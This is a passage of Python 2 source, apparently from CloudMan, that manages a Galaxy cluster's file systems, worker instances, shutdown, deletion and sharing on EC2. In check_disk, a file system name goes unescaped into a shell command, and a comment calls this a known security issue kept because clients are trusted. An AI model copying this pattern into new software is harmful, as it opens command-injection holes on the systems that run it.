{"size_used": "52M", "status": "Configuring", "kind": "Volume",
"mount_point": "/mnt/galaxyData", "name": "galaxyDataResize",
"snapshot_status": "pending", "err_msg": None, "persistent": "Yes",
"snapshot_progress": "10%", "from_snap": "snap-760fd33d",
"volume_id": "vol-d5f3f9a9", "device": "/dev/sdh", "size_pct": "2%",
"DoT": "No", "size": "5.0G"}], quiet=True)
def get_all_filesystems_status(self):
"""
Get a list and information about each of the file systems currently
managed by CloudMan.
"""
fss = []
fs_svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fs_svcs:
fss.append(fs.get_details())
return fss
# return []
# TEMP only; used to alternate input on the UI
# r = random.choice([1, 2, 3])
r = 4
log.debug("Dummy random #: %s" % r)
dummy = [{"name": "galaxyData",
"status": "Running",
"device": "/dev/sdg1",
"kind": "volume",
"mount_point": "/mnt/galaxyData",
"DoT": "No",
"size": "20G",
"size_used": "2G",
"size_pct": "90%",
"error_msg": None,
"volume_id": "vol-dbi23ins"}]
if r == 2 or r == 4:
dummy.append(
{"name": "1000g", "status": "Removing", "bucket_name": "1000genomes",
"kind": "bucket", "mount_point": "/mnt/100genomes", "DoT": "No",
"size": "N/A", "NFS_shared": True, "size_used": "", "size_pct": "", "error_msg": None})
if r == 3:
dummy[0]['status'] = "Adding"
if r == 4: # NGTODO: Hardcoded links below to tools and indices?
dummy.append({"name": "galaxyTools", "status": "Available", "device": "/dev/sdg3",
"kind": "snapshot", "mount_point": "/mnt/galaxyTools", "DoT": "Yes",
"size": "10G", "size_used": "1.9G", "size_pct": "19%",
"error_msg": None, "from_snap": "snap-bdr2whd"})
dummy.append({"name": "galaxyIndices", "status": "Error", "device": "/dev/sdg2",
"kind": "snapshot", "mount_point": "/mnt/galaxyIndices", "DoT": "Yes",
"size": "700G", "NFS_shared": True, "size_used": "675G", "size_pct": "96%",
"error_msg": "Process returned 2", "from_snap": "snap-89r23hd"})
dummy.append({"name": "custom", "status": "Available", "device": "/dev/sdg4",
"kind": "Volume", "mount_point": "/mnt/custom", "DoT": "No",
"size": "70G", "NFS_shared": True, "size_used": "53G", "size_pct": "7%",
"error_msg": ""})
return dummy
@TestFlag({"SGE": "Running", "Postgres": "Running", "Galaxy": "TestFlag",
"Filesystems": "Running"}, quiet=True)
def get_all_services_status(self):
"""
        Return a dictionary containing a list of currently running services and
        their status.
For example::
{"Postgres": "Running", "SGE": "Running", "Galaxy": "Running",
"Filesystems": "Running"}
"""
status_dict = {}
for srvc in self.services:
status_dict[srvc.name] = srvc.state # NGTODO: Needs special handling for file systems
return status_dict
def get_galaxy_rev(self):
"""
Get the Mercurial revision of the Galaxy instance that's running as a
CloudMan-managed service.
Return a string with either the revision (e.g., ``5757:963e73d40e24``)
or ``N/A`` if unable to get the revision number.
"""
cmd = "%s - galaxy -c \"cd %s; hg tip | grep -m 1 changeset | cut -d':' -f2,3\"" % (
paths.P_SU, self.app.path_resolver.galaxy_home)
process = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = process.communicate()
if out[1] != '':
rev = 'N/A'
else:
rev = out[0].strip()
return rev
def get_galaxy_admins(self):
admins = 'None'
try:
config_file = open(os.path.join(
self.app.path_resolver.galaxy_home, 'universe_wsgi.ini'), 'r').readlines()
for line in config_file:
if 'admin_users' in line:
admins = line.split('=')[1].strip()
break
except IOError:
pass
return admins
def get_permanent_storage_size(self):
pss = 0
fs_arr = self.get_services(svc_role=ServiceRole.GALAXY_DATA)
for fs in fs_arr:
for vol in fs.volumes:
pss += int(vol.size)
return pss
def check_disk(self):
try:
fs_arr = self.get_services(svc_role=ServiceRole.GALAXY_DATA)
if len(fs_arr) > 0:
fs_name = fs_arr[0].name
# NGTODO: Definite security issue here. After discussion with Enis, clients are considered trusted for now.
# We may later have to think about sanitizing/securing/escaping user input if the issue arises.
disk_usage = commands.getoutput("df -h | grep %s$ | awk '{print $2, $3, $5}'" % fs_name)
disk_usage = disk_usage.split(' ')
if len(disk_usage) == 3:
self.disk_total = disk_usage[0]
self.disk_used = disk_usage[1]
self.disk_pct = disk_usage[2]
except Exception, e:
log.error("Failure checking disk usage. %s" % e)
def get_cluster_status(self):
return self.cluster_status
def toggle_master_as_exec_host(self, force_removal=False):
""" By default, the master instance running all the services is also
an execution host and is used to run jobs. This method allows one
to toggle the master instance from being an execution host.
:type force_removal: bool
:param force_removal: If True, go through the process of removing
the instance from being an execution host
irrespective of the instance's current state.
:rtype: bool
:return: True if the master instance is set to be an execution host.
False otherwise.
"""
sge_svc = self.get_services(svc_role=ServiceRole.SGE)[0]
if sge_svc.state == service_states.RUNNING:
if self.master_exec_host is True or force_removal:
self.master_exec_host = False
if not sge_svc._remove_instance_from_exec_list(
self.app.cloud_interface.get_instance_id(),
self.app.cloud_interface.get_private_ip()):
                    # If the removal was unsuccessful, reset the flag
self.master_exec_host = True
else:
self.master_exec_host = True
if not sge_svc._add_instance_as_exec_host(
self.app.cloud_interface.get_instance_id(),
self.app.cloud_interface.get_private_ip()):
                    # If the addition was unsuccessful, reset the flag
self.master_exec_host = False
else:
log.warning(
"SGE not running thus cannot toggle master as exec host")
if self.master_exec_host:
log.info("The master instance has been set to execute jobs. To manually change this, use the cloudman admin panel.")
else:
log.info("The master instance has been set to *not* execute jobs. To manually change this, use the cloudman admin panel.")
return self.master_exec_host
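    # Illustrative usage (a sketch): the method is called with no arguments to
    # flip the current state (as done in ``add_instances`` below), or with
    # ``force_removal`` to make sure the master stops accepting jobs:
    #
    #   manager.toggle_master_as_exec_host()
    #   manager.toggle_master_as_exec_host(force_removal=True)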
def get_worker_instances(self):
instances = []
if self.app.TESTFLAG is True:
# for i in range(5):
# instance = Instance( self.app, inst=None, m_state="Pending" )
# instance.id = "WorkerInstance"
# instances.append(instance)
return instances
log.debug(
"Trying to discover any worker instances associated with this cluster...")
filters = {'tag:clusterName': self.app.ud['cluster_name'],
'tag:role': 'worker'}
try:
reservations = self.app.cloud_interface.get_all_instances(filters=filters)
for reservation in reservations:
if reservation.instances[0].state != 'terminated' and reservation.instances[0].state != 'shutting-down':
i = Instance(self.app, inst=reservation.instances[0],
m_state=reservation.instances[0].state, reboot_required=True)
instances.append(i)
log.info("Instance '%s' found alive (will configure it later)." % reservation.instances[0].id)
except EC2ResponseError, e:
log.debug("Error checking for live instances: %s" % e)
return instances
@TestFlag([])
def get_attached_volumes(self):
"""
Get a list of block storage volumes currently attached to this instance.
"""
log.debug(
"Trying to discover any volumes attached to this instance...")
attached_volumes = []
# TODO: Abstract filtering into the cloud interface classes
try:
if self.app.cloud_type == 'ec2':
# filtering w/ boto is supported only with ec2
f = {'attachment.instance-id':
self.app.cloud_interface.get_instance_id()}
attached_volumes = self.app.cloud_interface.get_ec2_connection()\
.get_all_volumes(filters=f)
else:
volumes = self.app.cloud_interface.get_ec2_connection().get_all_volumes()
for vol in volumes:
if vol.attach_data.instance_id == self.app.cloud_interface.get_instance_id():
attached_volumes.append(vol)
except EC2ResponseError, e:
log.debug("Error checking for attached volumes: %s" % e)
log.debug("Attached volumes: %s" % attached_volumes)
# Add ``clusterName`` tag to any attached volumes
for att_vol in attached_volumes:
self.app.cloud_interface.add_tag(att_vol, 'clusterName', self.app.ud['cluster_name'])
return attached_volumes
@TestFlag(None)
def shutdown(self, sd_apps=True, sd_filesystems=True, sd_instances=True,
sd_autoscaling=True, delete_cluster=False, sd_spot_requests=True,
rebooting=False):
"""
Shut down this cluster. This means shutting down all the services
(dependent on method arguments) and, optionally, deleting the cluster.
.. seealso:: `~cm.util.master.delete_cluster`
"""
log.debug("List of services before shutdown: %s" % [
s.get_full_name() for s in self.services])
self.cluster_status = cluster_status.SHUTTING_DOWN
# Services need to be shut down in particular order
if sd_autoscaling:
self.stop_autoscaling()
if sd_instances:
self.stop_worker_instances()
if sd_spot_requests:
for wi in self.worker_instances:
if wi.is_spot() and not wi.spot_was_filled():
wi.terminate()
# full_svc_list = self.services[:] # A copy to ensure consistency
if sd_apps:
for svc in self.get_services(svc_type=ServiceType.APPLICATION):
log.debug("Initiating removal of service {0}".format(svc.name))
svc.remove()
if sd_filesystems:
for svc in self.get_services(svc_type=ServiceType.FILE_SYSTEM):
log.debug("Initiating removal of file system service {0}".format(svc.name))
svc.remove(synchronous=True, delete_devices=delete_cluster)
# Wait for all the services to shut down before declaring the cluster shut down
# (but don't wait indefinitely)
        # This is required because, with the file systems being removed in parallel
        # via separate threads, those processes may not have completed by the time
        # the rest of the shutdown does.
time_limit = 300 # wait for max 5 mins before shutting down
while(time_limit > 0):
log.debug("Waiting ({0} more seconds) for all the services to shut down.".format(
time_limit))
num_off = 0
for srvc in self.services:
if srvc.state == service_states.SHUT_DOWN or srvc.state == service_states.ERROR or \
srvc.state == service_states.UNSTARTED:
num_off += 1
if num_off == len(self.services):
log.debug("All services shut down")
break
elif rebooting and self.app.cloud_type == 'ec2':
# For the EC2 cloud it's ok to reboot with volumes attached
log.debug("Not waiting for all the services to shut down because we're just rebooting.")
break
sleep_time = 6
time.sleep(sleep_time)
time_limit -= sleep_time
        # Automatically delete transient clusters on terminate (because no data
        # will persist, so there is no point in polluting the list of buckets)
if delete_cluster or (self.cluster_storage_type == 'transient' and not rebooting):
self.delete_cluster()
self.cluster_status = cluster_status.TERMINATED
log.info("Cluster %s shut down at %s (uptime: %s). If not done automatically, "
"manually terminate the master instance (and any remaining instances "
"associated with this cluster) from the %s cloud console."
% (self.app.ud['cluster_name'], Time.now(), (Time.now() - self.startup_time),
self.app.ud.get('cloud_name', '')))
def reboot(self, soft=False):
"""
Reboot the entire cluster, first shutting down appropriate services.
"""
if self.app.TESTFLAG is True:
log.debug("Restart the cluster but the TESTFLAG is set")
return False
# Spot requests cannot be tagged and thus there is no good way of associating those
# back with a cluster after a reboot so cancel those
log.debug("Initiating cluster reboot.")
        # Detach the file system volumes on all clouds except EC2, where it is
        # safe to reboot with volumes attached
sd_filesystems = True
if self.app.cloud_type == 'ec2':
sd_filesystems = False
self.shutdown(sd_filesystems=sd_filesystems, sd_instances=False, rebooting=True)
if soft:
if misc.run("{0} restart".format(os.path.join(self.app.ud['boot_script_path'],
self.app.ud['boot_script_name']))):
return True
else:
log.error(
"Trouble restarting CloudMan softly; rebooting instance now.")
ec2_conn = self.app.cloud_interface.get_ec2_connection()
try:
log.debug("Rebooting self now...")
ec2_conn.reboot_instances(
[self.app.cloud_interface.get_instance_id()])
return True
except EC2ResponseError, e:
log.error("Error rebooting master instance (i.e., self): %s" % e)
return False
def terminate_master_instance(self, delete_cluster=False):
"""
Terminate the master instance using the cloud middleware API.
If ``delete_cluster`` is set to ``True``, delete all cluster
components before terminating the instance.
.. seealso:: `~cm.util.master.delete_cluster`
"""
if self.cluster_status != cluster_status.TERMINATED:
self.shutdown(delete_cluster=delete_cluster)
log.debug("Terminating the master instance")
self.app.cloud_interface.terminate_instance(
self.app.cloud_interface.get_instance_id())
def delete_cluster(self):
"""
Completely delete this cluster. This involves deleting the cluster's
bucket as well as volumes containing user data file system(s)! The
list of volumes to be deleted can either be provided as an argument or,
for the case of EC2 only, will be automatically derived.
.. warning::
This action is irreversible. All data will be permanently deleted.
"""
log.info("All services shut down; deleting this cluster.")
# Delete any remaining volume(s) assoc. w/ the current cluster
try:
if self.app.cloud_type == 'ec2':
filters = {'tag:clusterName': self.app.ud['cluster_name']}
vols = self.app.cloud_interface.get_all_volumes(filters=filters)
log.debug("Remaining volumes associated with this cluster: {0}".format(vols))
for vol in vols:
if vol.status == 'available':
log.debug("As part of cluster deletion, deleting volume '%s'" % vol.id)
vol.delete()
else:
log.debug("Not deleting volume {0} because it is in state {1}"
.format(vol.id, vol.status))
except EC2ResponseError, e:
log.error("Error deleting a volume: %s" % e)
# Delete cluster bucket on S3
s3_conn = self.app.cloud_interface.get_s3_connection()
if s3_conn:
misc.delete_bucket(s3_conn, self.app.ud['bucket_cluster'])
def clean(self):
"""
Clean the system as if it was freshly booted. All services are shut down
and any changes made to the system since service start are reverted (this
excludes any data on user data file system).
"""
log.debug("Cleaning the system - all services going down")
# TODO: #NGTODO: Possibility of simply calling remove on ServiceType.FILE_SYSTEM
# service so that all dependencies are automatically removed?
svcs = self.get_services(svc_role=ServiceRole.GALAXY)
for service in svcs:
service.remove()
svcs = self.get_services(svc_role=ServiceRole.GALAXY_POSTGRES)
for service in svcs:
service.remove()
self.stop_worker_instances()
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for service in svcs:
service.clean()
svcs = self.get_services(svc_role=ServiceRole.SGE)
for service in svcs:
service.clean()
def get_idle_instances(self):
"""
Get a list of instances that are currently not executing any job manager
jobs. Return a list of ``Instance`` objects.
"""
# log.debug( "Looking for idle instances" )
idle_instances = [] # List of Instance objects corresponding to idle instances
if os.path.exists('%s/default/common/settings.sh' % self.app.path_resolver.sge_root):
proc = subprocess.Popen("export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; "
"%s/bin/lx24-amd64/qstat -f | grep all.q" % (
self.app.path_resolver.sge_root, self.app.path_resolver.sge_root),
shell=True, stdout=subprocess.PIPE)
qstat_out = proc.communicate()[0]
# log.debug( "qstat output: %s" % qstat_out )
instances = qstat_out.splitlines()
nodes_list = [] # list of nodes containing node's domain name and number of used processing slots
idle_instances_dn = [] # list of domain names of idle instances
for inst in instances:
# Get instance domain name and # of used processing slots: ['domU-12-31-38-00-48-D1.c:0']
nodes_list.append(inst.split('@')[1].split(' ')[0] + ':' + inst.split('/')[1])
# if len( nodes_list ) > 0:
# log.debug( "Processed qstat output: %s" % nodes_list )
for node in nodes_list:
# If number of used slots on given instance is 0, mark it as idle
if int(node.split(':')[1]) == 0:
idle_instances_dn.append(node.split(':')[0])
# if len( idle_instances_dn ) > 0:
# log.debug( "Idle instances' DNs: %s" % idle_instances_dn )
for idle_instance_dn in idle_instances_dn:
for w_instance in self.worker_instances:
# log.debug("Trying to match worker instance with private IP '%s' to idle "
# "instance '%s'" % (w_instance.get_local_hostname(), idle_instance_dn))
if w_instance.get_local_hostname() is not None:
if w_instance.get_local_hostname().lower().startswith(str(idle_instance_dn).lower()):
# log.debug("Marking instance '%s' with FQDN '%s' as idle." \
# % (w_instance.id, idle_instance_dn))
idle_instances.append(w_instance)
return idle_instances
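    # Parsing assumption illustrated (values are made up): a ``qstat -f`` line for
    # the all.q queue is expected to look roughly like
    #
    #   all.q@domU-12-31-38-00-48-D1.c  BIP   0/0/1   0.00   lx24-amd64
    #
    # so splitting on '@' and '/' yields "domU-12-31-38-00-48-D1.c:0", i.e. the
    # node's domain name plus the number of used slots; nodes with 0 used slots
    # are treated as idle.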
def remove_instances(self, num_nodes, force=False):
"""
Remove a number (``num_nodes``) of worker instances from the cluster, first
deciding which instance(s) to terminate and then removing them from SGE and
terminating. An instance is deemed removable if it is not currently running
any jobs.
Note that if the number of removable instances is smaller than the
number of instances requested to remove, the smaller number of instances
is removed. This can be overridden by setting ``force`` to ``True``. In that
case, removable instances are removed first, then additional instances are
chosen at random and removed.
"""
num_terminated = 0
# First look for idle instances that can be removed
idle_instances = self.get_idle_instances()
if len(idle_instances) > 0:
log.debug("Found %s idle instances; trying to remove %s." %
(len(idle_instances), num_nodes))
for i in range(0, num_nodes):
for inst in idle_instances:
if num_terminated < num_nodes:
self.remove_instance(inst.id)
num_terminated += 1
else:
log.info("No idle instances found")
log.debug("Num to terminate: %s, num terminated: %s; force set to '%s'"
% (num_nodes, num_terminated, force))
# If force is set, terminate requested number of instances regardless
# whether they are idle
if force is True and num_terminated < num_nodes:
force_kill_instances = num_nodes - num_terminated
log.info(
"Forcefully terminating %s instances." % force_kill_instances)
for i in range(force_kill_instances):
for inst in self.worker_instances:
if not inst.is_spot() or inst.spot_was_filled():
self.remove_instance(inst.id)
num_terminated += 1
if num_terminated > 0:
log.info("Initiated requested termination of instances. Terminating '%s' instances."
% num_terminated)
else:
log.info("Did not terminate any instances.")
def remove_instance(self, instance_id=''):
"""
Remove an instance with ID ``instance_id`` from the cluster. This means
that the instance is first removed from the job manager as a worker and
then it is terminated via cloud middleware API.
"""
if instance_id == '':
log.warning(
"Tried to remove an instance but did not receive instance ID")
return False
log.debug("Specific termination of instance '%s' requested." % instance_id)
for inst in self.worker_instances:
if inst.id == instance_id:
sge_svc = self.get_services(svc_role=ServiceRole.SGE)[0]
# DBTODO Big problem here if there's a failure removing from allhosts. Need to handle it.
# if sge_svc.remove_sge_host(inst.get_id(), inst.get_private_ip()) is True:
# Best-effort PATCH until above issue is handled
if inst.get_id() is not None:
sge_svc.remove_sge_host(
inst.get_id(), inst.get_private_ip())
# Remove the given instance from /etc/hosts files
log.debug("Removing instance {0} from /etc/hosts".format(
inst.get_id()))
for line in fileinput.input('/etc/hosts', inplace=1):
line = line.strip()
# (print all lines except the one w/ instance IP back to the file)
if not inst.private_ip in line:
print line
try:
inst.terminate()
except EC2ResponseError, e:
log.error("Trouble terminating instance '{0}': {1}".format(
instance_id, e))
log.info("Initiated requested termination of instance. Terminating '%s'." %
instance_id)
def reboot_instance(self, instance_id='', count_reboot=True):
"""
Using cloud middleware API, reboot instance with ID ``instance_id``.
``count_reboot`` indicates whether this count should be counted toward
the instance ``self.config.instance_reboot_attempts`` (see `Instance`
`reboot` method).
"""
if instance_id == '':
log.warning("Tried to reboot an instance but did not receive instance ID")
return False
log.info("Specific reboot of instance '%s' requested." % instance_id)
for inst in self.worker_instances:
if inst.id == instance_id:
inst.reboot(count_reboot=count_reboot)
log.info("Initiated requested reboot of instance. Rebooting '%s'." % instance_id)
def add_instances(self, num_nodes, instance_type='', spot_price=None):
# Remove master from execution queue automatically
if self.master_exec_host:
self.toggle_master_as_exec_host()
self.app.cloud_interface.run_instances(num=num_nodes,
instance_type=instance_type,
spot_price=spot_price)
def add_live_instance(self, instance_id):
"""
Add an existing instance to the list of worker instances tracked by the master;
get a handle to the instance object in the process.
"""
try:
log.debug("Adding live instance '%s'" % instance_id)
reservation = self.app.cloud_interface.get_all_instances(instance_id)
if reservation and len(reservation[0].instances) == 1:
instance = reservation[0].instances[0]
if instance.state != 'terminated' and instance.state != 'shutting-down':
i = Instance(self.app, inst=instance, m_state=instance.state)
self.app.cloud_interface.add_tag(instance, 'clusterName',
self.app.ud['cluster_name'])
# Default to 'worker' role tag
self.app.cloud_interface.add_tag(instance, 'role', 'worker')
self.app.cloud_interface.add_tag(instance, 'Name',
"Worker: {0}".format(self.app.ud['cluster_name']))
self.worker_instances.append(i)
i.send_alive_request() # to make sure info like ip-address and hostname are updated
log.debug('Added instance {0}....'.format(instance_id))
else:
log.debug("Live instance '%s' is at the end of its life (state: %s); not adding the instance." %
(instance_id, instance.state))
return True
except EC2ResponseError, e:
log.debug(
"Problem adding a live instance (tried ID: %s): %s" % (instance_id, e))
return False
@TestFlag(None)
def init_cluster(self, cluster_type, pss=0, storage_type='volume'):
"""
Initialize the type for this cluster and start appropriate services,
storing the cluster configuration into the cluster's bucket.
This method applies only to a new cluster.
:type cluster_type: string
:param cluster_type: Type of cluster being setup. Currently, accepting
values ``Galaxy``, ``Data``, or ``SGE``
:type pss: int
:param pss: Persistent Storage Size associated with data volumes being
created for the cluster
"""
def _add_data_fs():
"""
A local convenience method used to add a new file system
"""
if self.get_services(svc_role=ServiceRole.GALAXY_DATA):
return
fs_name = ServiceRole.to_string(ServiceRole.GALAXY_DATA)
log.debug("Creating a new data filesystem: '%s'" % fs_name)
fs = Filesystem(
self.app, fs_name, svc_roles=[ServiceRole.GALAXY_DATA])
fs.add_volume(size=pss)
self.add_master_service(fs)
self.cluster_status = cluster_status.STARTING
self.initial_cluster_type = cluster_type
self.cluster_storage_type = storage_type
msg = "Initializing '{0}' cluster type with storage type '{1}'. Please wait...".format(cluster_type, storage_type)
log.info(msg)
self.app.msgs.info(msg)
if cluster_type == 'Galaxy':
# Turn those data sources into file systems
if self.snaps:
attached_volumes = self.get_attached_volumes()
for snap in [s for s in self.snaps if 'name' in s]:
if 'roles' in snap:
fs = Filesystem(self.app, snap['name'],
svc_roles=ServiceRole.from_string_array(snap['roles']))
# Check if an already attached volume maps to the current filesystem
att_vol = self.get_vol_if_fs(attached_volumes, snap['name'])
if att_vol:
log.debug("{0} file system has volume(s) already attached".format(
snap['name']))
fs.add_volume(vol_id=att_vol.id,
size=att_vol.size, from_snapshot_id=att_vol.snapshot_id)
# snap_size = att_vol.size
elif 'snap_id' in snap:
log.debug("There are no volumes already attached for file system {0}"
.format(snap['name']))
size = 0
if ServiceRole.GALAXY_DATA in ServiceRole.from_string_array(snap['roles']):
size = pss
fs.add_volume(size=size, from_snapshot_id=snap['snap_id'])
# snap_size = snap.get('size', 0)
elif 'type' in snap:
if 'archive' == snap['type'] and 'archive_url' in snap:
log.debug("Attaching a volume based on an archive named {0}"
.format(snap['name']))
if storage_type == 'volume':
if 'size' in snap:
size = snap['size']
if ServiceRole.GALAXY_DATA in ServiceRole.from_string_array(snap['roles']):
if pss > snap['size']:
size = pss
from_archive = {'url': snap['archive_url'],
'md5_sum': snap.get('archive_md5', None)}
fs.add_volume(size=size, from_archive=from_archive)
else:
log.error("Format error in snaps.yaml file. No size specified for volume based on archive {0}"
.format(snap['name']))
elif storage_type == 'transient':
from_archive = {'url': snap['archive_url'],
'md5_sum': snap.get('archive_md5', None)}
fs.add_transient_storage(from_archive=from_archive)
else:
log.error("Unknown storage type {0} for archive extraction."
.format(storage_type))
elif 'gluster' == snap['type'] and 'server' in snap:
log.debug("Attaching a glusterfs based filesystem named {0}"
.format(snap['name']))
fs.add_glusterfs(snap['server'], mount_options=snap.get('mount_options', None))
elif 'nfs' == snap['type'] and 'server' in snap:
log.debug("Attaching an nfs based filesystem named {0}"
.format(snap['name']))
fs.add_nfs(snap['server'], None, None, mount_options=snap.get('mount_options', None))
elif 's3fs' == snap['type'] and 'bucket_name' in snap and 'bucket_a_key' in snap and 'bucket_s_key' in snap:
fs.add_bucket(snap['bucket_name'], snap['bucket_a_key'], snap['bucket_s_key'])
else:
log.error("Format error in snaps.yaml file. Unrecognised or improperly configured type '{0}' for fs named: {1}"
                                      .format(snap['type'], snap['name']))
log.debug("Adding a filesystem '{0}' with volumes '{1}'"
.format(fs.get_full_name(), fs.volumes))
self.add_master_service(fs)
# Add a file system for user's data
if self.app.use_volumes:
_add_data_fs()
# Add PostgreSQL service
self.add_master_service(PostgresService(self.app))
# Add ProFTPd service
self.add_master_service(ProFTPdService(self.app))
# Add Galaxy service
self.add_master_service(GalaxyService(self.app))
# Add Galaxy Reports service
self.add_master_service(GalaxyReportsService(self.app))
elif cluster_type == 'Data':
# Add a file system for user's data if one doesn't already exist
_add_data_fs()
elif cluster_type == 'SGE':
# SGE service is automatically added at cluster start (see
# ``start`` method)
pass
else:
log.error("Tried to initialize a cluster but received an unknown type: '%s'"
% cluster_type)
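    # Illustrative usage (a sketch; argument values are assumptions): a brand new
    # cluster is initialized once with a type, a persistent storage size (GB) for
    # the data volume, and a storage backend, e.g.:
    #
    #   manager.init_cluster('Galaxy', pss=100, storage_type='volume')
    #   manager.init_cluster('Data', pss=20)
    #   manager.init_cluster('SGE')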
@TestFlag(True)
@synchronized(s3_rlock)
def init_shared_cluster(self, share_string):
"""
Initialize a new (i.e., derived) cluster from a shared one, whose details
need to be provided in the ``share_string`` (e.g.,
``cm-808d863548acae7c2328c39a90f52e29/shared/2012-09-17--19-47``)
This method can only be called at a new cluster start.
"""
self.cluster_status = cluster_status.STARTING
log.debug("Initializing a shared cluster from '%s'" % share_string)
s3_conn = self.app.cloud_interface.get_s3_connection()
ec2_conn = self.app.cloud_interface.get_ec2_connection()
try:
share_string = share_string.strip('/')
bucket_name = share_string.split('/')[0]
cluster_config_prefix = os.path.join(
share_string.split('/')[1], share_string.split('/')[2])
except Exception, e:
log.error("Error while parsing provided shared cluster's bucket '%s': %s" % (
share_string, e))
return False
# Check that the shared cluster's bucket exists
if not misc.bucket_exists(s3_conn, bucket_name, validate=False):
log.error(
"Shared cluster's bucket '%s' does not exist or is not accessible!" % bucket_name)
return False
# Create the new cluster's bucket
if not misc.bucket_exists(s3_conn, self.app.ud['bucket_cluster']):
misc.create_bucket(s3_conn, self.app.ud['bucket_cluster'])
# Copy contents of the shared cluster's bucket to the current cluster's
# bucket
fl = "shared_instance_file_list.txt"
if misc.get_file_from_bucket(s3_conn, bucket_name,
os.path.join(cluster_config_prefix, fl), fl, validate=False):
key_list = misc.load_yaml_file(fl)
for key in key_list:
misc.copy_file_in_bucket(
s3_conn, bucket_name, self.app.ud['bucket_cluster'],
key, key.split('/')[-1], preserve_acl=False, validate=False)
else:
log.error("Problem copying shared cluster configuration files. Cannot continue with "
"the shared cluster initialization.")
return False
# Create a volume from shared cluster's data snap and set current
# cluster's data volume
shared_cluster_pd_file = 'shared_p_d.yaml'
if misc.get_file_from_bucket(
s3_conn, self.app.ud['bucket_cluster'], 'persistent_data.yaml',
shared_cluster_pd_file):
scpd = misc.load_yaml_file(shared_cluster_pd_file)
self.initial_cluster_type = scpd.get('cluster_type', None)
log.debug("Initializing %s cluster type from shared cluster" % self.initial_cluster_type)
if 'shared_data_snaps' in scpd:
shared_data_vol_snaps = scpd['shared_data_snaps']
try:
# TODO: If support for multiple volumes comprising a file system becomes available,
# this code will need to adjusted to accommodate that. Currently, the assumption is
# that only 1 snap ID will be provided as the data file
# system.
snap = ec2_conn.get_all_snapshots(shared_data_vol_snaps)[0]
# Create a volume here because we'll be dealing with a volume-based file system
# and for that we need a volume ID
data_vol = ec2_conn.create_volume(
snap.volume_size, self.app.cloud_interface.get_zone(),
snapshot=snap)
# Old style for persistent data - delete if the other method works as expected
# scpd['data_filesystems'] = {'galaxyData': [{'vol_id': data_vol.id, 'size': data_vol.size}]}
# Compose a persistent_data compatible entry for the shared data volume so that
# the appropriate file system can be created as part of ``add_preconfigured_services``
# TODO: make it more general vs. galaxy specific
data_fs_yaml = {'ids': [data_vol.id],
'kind': 'volume',
'mount_point': '/mnt/galaxy',
'name': 'galaxy',
'roles': ['galaxyTools', 'galaxyData']}
scpd['filesystems'].append(data_fs_yaml)
log.info("Created a data volume '%s' of size %sGB from shared cluster's snapshot '%s'"
% (data_vol.id, data_vol.size, snap.id))
# Don't make the new cluster shared by default
del scpd['shared_data_snaps']
# Update new cluster's persistent_data.yaml
cc_file_name = 'cm_cluster_config.yaml'
log.debug("Dumping scpd to file {0} (which will become persistent_data.yaml): {1}"
.format(cc_file_name, scpd))
misc.dump_yaml_to_file(scpd, cc_file_name)
misc.save_file_to_bucket(
s3_conn, self.app.ud[
'bucket_cluster'], 'persistent_data.yaml',
cc_file_name)
except EC2ResponseError, e:
log.error("EC2 error creating volume from shared cluster's snapshot '%s': %s"
% (shared_data_vol_snaps, e))
return False
except Exception, e:
log.error("Error creating volume from shared cluster's snapshot '%s': %s"
% (shared_data_vol_snaps, e))
return False
else:
log.error("Loaded configuration from the shared cluster does not have a reference "
"to a shared data snapshot. Cannot continue.")
return False
# TODO: Reboot the instance so CloudMan source downloaded from the shared
# instance is used
# log.info("Rebooting the cluster so shared instance source can be reloaded.")
# self.reboot(soft=True)
# Reload user data and start the cluster as normally would
self.app.ud = self.app.cloud_interface.get_user_data(force=True)
if misc.get_file_from_bucket(s3_conn, self.app.ud['bucket_cluster'], 'persistent_data.yaml', 'pd.yaml'):
pd = misc.load_yaml_file('pd.yaml')
self.app.ud = misc.merge_yaml_objects(self.app.ud, pd)
reload(paths) # Must reload because paths.py might have changes in it
self.add_preconfigured_services()
return True
@TestFlag({})
@synchronized(s3_rlock)
def share_a_cluster(self, user_ids=None, canonical_ids=None):
"""
Setup the environment to make the current cluster shared (via a shared
volume snapshot).
This entails stopping all services to enable creation of a snapshot of
the data volume, allowing others to create a volume from the created
snapshot as well giving read permissions to cluster's bucket. If user_ids
are not provided, the bucket and the snapshot are made public.
:type user_ids: list
:param user_ids: The numeric Amazon IDs of users (with no dashes) to
give read permissions to the bucket and snapshot
:type canonical_ids: list
:param canonical_ids: A list of Amazon Canonical IDs (in the same linear
order as the ``user_ids``) that will be used to
enable sharing of individual objects in the
cluster's bucket.
"""
# TODO: rewrite this to use > 3 character variable names.
# TODO: recover services if the process fails midway
log.info("Setting up the cluster for sharing")
self.cluster_manipulation_in_progress = True
self._stop_app_level_services()
# Initiate snapshot of the galaxyData file system
snap_ids = []
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles:
snap_ids = svc.create_snapshot(snap_description="CloudMan share-a-cluster %s; %s"
% (self.app.ud['cluster_name'], self.app.ud['bucket_cluster']))
# Create a new folder-like structure inside cluster's bucket and copy
# the cluster configuration files
s3_conn = self.app.cloud_interface.get_s3_connection()
# All of the shared cluster's config files will be stored with the
# specified prefix
shared_names_root = "shared/%s" % Time.now().strftime("%Y-%m-%d--%H-%M")
# Create current cluster config and save it to cluster's shared location,
# including the freshly generated snap IDs
conf_file_name = 'cm_shared_cluster_conf.yaml'
addl_data = {'shared_data_snaps': snap_ids}
self.console_monitor.create_cluster_config_file(
conf_file_name, addl_data=addl_data)
# Remove references to cluster's own data; this is shared via the snapshots above
# TODO: Add an option for a user to include any self-added file systems
# as well
sud = misc.load_yaml_file(conf_file_name)
fsl = sud.get('filesystems', [])
sfsl = [] # Shared file systems list
for fs in fsl:
roles = ServiceRole.from_string_array(fs['roles'])
# Including GALAXY_TOOLS role here breaks w/ new combined galaxyData/galaxyTools volume. We should
# probably change this to actually inspect and share base snapshots if applicable (like galaxyIndices) but
# never volumes.
# if ServiceRole.GALAXY_TOOLS in roles or ServiceRole.GALAXY_INDICES in roles:
if ServiceRole.GALAXY_INDICES in roles:
sfsl.append(fs)
sud['filesystems'] = sfsl
